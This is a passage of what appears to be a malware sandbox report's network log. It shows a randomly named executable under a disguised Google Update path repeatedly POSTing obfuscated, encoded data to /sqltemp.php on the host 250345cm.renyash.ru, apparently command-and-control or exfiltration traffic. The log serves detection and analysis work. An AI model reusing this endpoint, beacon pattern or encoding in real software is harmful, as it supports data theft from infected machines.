                                                                                                                  Data Ascii: VWZQQ_QVXVRYV\YV[YT^UZPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$/]4?*$D,&7>/<0), ",?+C&Y+9:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:48.053347111 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:48.312625885 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLsw2RVbya9%2Bd3g1kpGOHjT9lxpYKqHzbGo2mSPY0sr0dU5nTMGWZ619VB4FNARl6xaZQDN3wXeZGOTq14yWYyl0SD4NL59mCQvtBc4iiPQ3Y1f%2Fifm5DFVbbCCB%2B8go1HG%2FiIu9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364760c4342df-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2592&min_rtt=1643&rtt_var=2514&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=158059&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.662649104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:48.456559896 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:48.813548088 CET1124OUTData Raw: 56 54 5f 56 51 5b 54 52 58 56 52 59 56 58 59 5e 5b 5c 54 51 55 5a 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_VQ[TRXVRYVXY^[\TQUZPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.&?"<%$X7A/W =(_+_<*,]#"4<;)%/.&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:02:48.901920080 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:49.160979986 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQCzcF9p47u4XCcElNtmTHAGqlNsR1nc%2BonP3eC9uRN8z0gQ7fk4Lr5alEoAa4Ei4W0seXuM%2F4%2F4vpThDe2zIqsXJup4%2B746ViCkKyFZVJMeKgbEqvEdsdiJi%2BGwaTgLvzHBumug"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3647b585d0cc6-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=1711&rtt_var=1489&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=286106&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.662656104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:49.286887884 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:49.641509056 CET1124OUTData Raw: 53 57 5a 51 51 58 54 52 58 56 52 59 56 5a 59 57 5b 53 54 5a 55 55 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SWZQQXTRXVRYVZYW[STZUUPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0>#Y!\%.;8W =;(:'U(.X 7((=%/8-&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:49.758861065 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:50.027173996 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BD0xGFzw1zgGUfG9gXqejUK%2BT8p1E%2BZbHvPbG71%2Fi%2F3fQPUsorzkYxFA5DXJRK0bPzL0mqGI8Qm1tC1HAcUXkCWiQ4EhKduSr9XLrVchzCeT4f7NHJJrZonOskbJVGFtPWCaTkoO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36480a8974286-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4376&min_rtt=1630&rtt_var=6103&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=61867&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.662662104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:50.163727045 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:50.618284941 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:50.629998922 CET1124OUTData Raw: 53 53 5f 54 51 58 54 5d 58 56 52 59 56 51 59 53 5b 58 54 58 55 55 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_TQXT]XVRYVQYS[XTXUUP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[$5X#%37@.*& *)'R*=8]!2'\(9A&,*&Y.,Y-


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  49192.168.2.662666104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:50.710372925 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:51.063600063 CET1964OUTData Raw: 53 53 5f 53 51 5b 54 5d 58 56 52 59 56 5d 59 5e 5b 5c 54 5a 55 58 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_SQ[T]XVRYV]Y^[\TZUXP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3?=]7/.%-;E;)!R4Z(94>X \72(<;$?,-*&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:02:51.175319910 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:51.433964968 CET958INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18lIsAgiah6l37zZvyRCWoRcosEHlwO8%2BnIgx%2B8DF8RfCizYrEM6LojQuRCykBuRT2jjksiAj%2BD%2BsKwZ6zbcC9Utv3WMgh4GXFvCsLcSGQ0XwGTknSl1kBiSuTp3Y%2Bm6Z0dzN9qD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364898dc50f4d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2937&min_rtt=1719&rtt_var=3081&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=127321&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 0f 3d 3d 36 55 32 54 24 59 3f 3d 3f 53 27 3d 35 04 2b 01 31 04 30 3e 09 59 29 17 3c 05 21 2f 31 59 32 06 28 58 34 03 05 13 33 34 2b 59 05 1c 20 06 21 11 27 00 29 3d 09 15 31 59 2e 05 27 3d 20 14 28 01 34 1e 22 2b 27 5a 30 03 3f 04 3d 04 28 1f 33 02 33 19 39 11 00 0c 27 2a 2c 54 00 11 26 57 27 08 37 04 37 34 27 05 36 0f 39 12 31 24 32 53 24 2f 24 0c 20 00 39 00 27 21 33 59 21 30 2e 12 27 38 3d 5d 20 03 2c 0b 3d 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&==6U2T$Y?=?S'=5+10>Y)<!/1Y2(X434+Y !')=1Y.'= (4"+'Z0?=(339'*,T&W'774'691$2S$/$ 9'!3Y!0.'8=] ,=.%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  50192.168.2.662669104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:51.030154943 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:51.377640009 CET1124OUTData Raw: 56 56 5f 57 51 5c 51 52 58 56 52 59 56 5e 59 5f 5b 59 54 59 55 5b 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_WQ\QRXVRYV^Y_[YTYU[PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.$)"/'>'/9>7$_+#*4\7++!D%Y7R9:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:51.481091022 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:51.648478031 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mv74JsviBj2sCUNl6papZR%2F%2ByYJgUk9NW3LH4OpkzEjO3uarqqbEJ3r7oVu8gxIstpcKOmP6EXEEo0ut%2BVvKbDIM3xxKT57OnFw95B4vIjDnqW5DfNQtCvEmV5SRIVRLrNhKjek8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3648b68494267-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8032&min_rtt=1746&rtt_var=13227&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=28056&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  51192.168.2.662675104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:51.885951996 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:52.235344887 CET1124OUTData Raw: 53 50 5a 56 54 50 54 5c 58 56 52 59 56 5a 59 5e 5b 5b 54 5b 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZVTPT\XVRYVZY^[[T[UXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.0>7,:0.E8=7,('*>Y72,*+@&?.*&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:52.348953009 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:52.608517885 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0J88q5Gt6gGOde1eXrPbND5XFPT0WYHD8oArgv4GJkiYjSXK0Ch%2F%2Fl%2BKpgyfeVK5rBIw%2F3%2BIyExlARs3qorlW6V7ynCo%2BdrHe4S7yM1O1puiLiJJkfSQF0DD2rPGTT3gF95UQC%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36490ddb94219-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4698&min_rtt=1745&rtt_var=6560&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=57548&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  52192.168.2.662681104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:52.738939047 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:53.187520027 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:53.189836025 CET1124OUTData Raw: 56 54 5f 56 54 5a 54 52 58 56 52 59 56 51 59 53 5b 5a 54 5d 55 55 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_VTZTRXVRYVQYS[ZT]UUPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y'?"/3',=7><Z<9R>?##Y?+.1?R.:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:53.549643993 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QI3zZ5UpylqdNzpp%2Bw7sqWmfQIfJYn6kh6kDHPgwZfDRk7miDNnjTGMZyMTXKGi1TTo0lCaQqWywuwdcr6sQVQxNicHVzir7RlHYvYTEcDMs%2FMXgvSlYm2ixEICxz4emMF2gt%2FQ2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364962fc84321-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3864&min_rtt=2616&rtt_var=3478&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=115827&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  53192.168.2.662688104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:53.676897049 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:54.032226086 CET1124OUTData Raw: 56 57 5f 56 54 59 54 50 58 56 52 59 56 5f 59 53 5b 5e 54 5f 55 5a 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VW_VTYTPXVRYV_YS[^T_UZPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?9Y#)_$87*93V>8 0+&2U::&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:02:54.121498108 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:54.284826040 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FhmGaZeiV2JHE7eUxR0w1TlpEbjsRD6oJlAQJb8PU4Bl9jt4UFFKYKPGRwMkLO6Ld4B1ZdGoaabTJvqAKTOyyxwzdl3dK%2B0L3AMiloPnudMm2DyU0lBfQhCih8PMKjgO7xyj9eq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3649bf9ce41d8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=1719&rtt_var=1260&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=349115&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  54192.168.2.662689104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:54.420037031 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:54.766705036 CET1124OUTData Raw: 56 5f 5a 50 54 50 54 50 58 56 52 59 56 50 59 55 5b 53 54 5e 55 59 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V_ZPTPTPXVRYVPYU[ST^UYPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&<6#)]3A/1R#.'+#*(] "*;1,?R-*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:54.867084026 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:55.041129112 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
